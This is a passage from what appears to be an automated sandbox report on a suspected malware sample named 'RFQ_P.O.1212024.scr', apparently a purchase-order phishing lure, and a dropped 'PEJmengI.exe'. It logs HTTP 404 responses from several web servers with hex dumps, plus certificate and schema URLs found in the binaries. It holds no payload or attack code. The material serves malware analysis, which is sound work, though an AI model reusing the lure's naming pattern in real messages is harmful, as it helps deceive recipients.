65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Thu, 12 Dec 2024 09:22:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Thu, 12 Dec 2024 09:22:16 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Thu, 12 Dec 2024 09:22:19 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.3Date: Thu, 12 Dec 2024 09:22:22 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 67 79 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ugyg/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Thu, 12 Dec 2024 09:22:29 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Thu, 12 Dec 2024 09:22:31 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Thu, 12 Dec 2024 09:22:34 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=iso-8859-1content-length: 196date: Thu, 12 Dec 2024 09:22:36 GMTserver: LiteSpeedx-tuned-by: N0Cconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 09:23:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 09:23:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 09:23:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 09:23:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:23:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiFVU4h0fkkU8Pefzot4px3xPyk0Mp7u6Q2EojwrvNTgIo3223LnSwzYfZI3f1EnvaipqjCnUVci%2FP7WTODlFrLX3FnXqePhaIaP6IIljAaBt49elFE2mjYIL64W%2FWAA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f0ca843aeda4269-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2322&min_rtt=2322&rtt_var=1161&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2757&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:23:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSwgAPS8SaycOJ1sORdTduPG3AcX16aUGES9tKRy2V9o0ptbx5UcojZr7ZVbAoEOl9njSD%2B8FpeYx4T3hU7y18QF32GKkSrA9RkhcXzf6dEaPJkykgmK8Qn1r1I9kYfk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f0ca856dc487ce2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2031&min_rtt=2031&rtt_var=1015&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:23:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gG60QB2uE%2BTi7h7ygzN2wL0kEKf80yQ2CHDyamVOVtC0m7SKsJzqznpr9MXugXfny%2FuKle6Q0yboNKAFIfb1NCUoHM0wuCU2VAiSpMlAd%2BfV%2BE4ZMN8QNjPZ07ha8Ym"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f0ca867883a5e80-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2055&min_rtt=2055&rtt_var=1027&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=4221&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:23:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZ5J7MLtGi6nVmwyiMeJvh6yBddV2nShL4yljVGYh9FTAStbNL4YKeTdwO66%2FN2EzvovszjHDDLlYdIAfKECZsUyxklYrAE5oSBjmfDPGhbsfhryAuhZTFt3pglVxSEm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f0ca8781d168c72-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1924&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pa
                Source: RFQ_P.O.1212024.scr, PEJmengI.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: RFQ_P.O.1212024.scr, PEJmengI.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: RFQ_P.O.1212024.scr, PEJmengI.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.373003710.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, RFQ_P.O.1212024.scr, 00000000.00000002.373003710.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, PEJmengI.exe, 0000000A.00000002.417275627.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, PEJmengI.exe, 0000000A.00000002.417275627.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
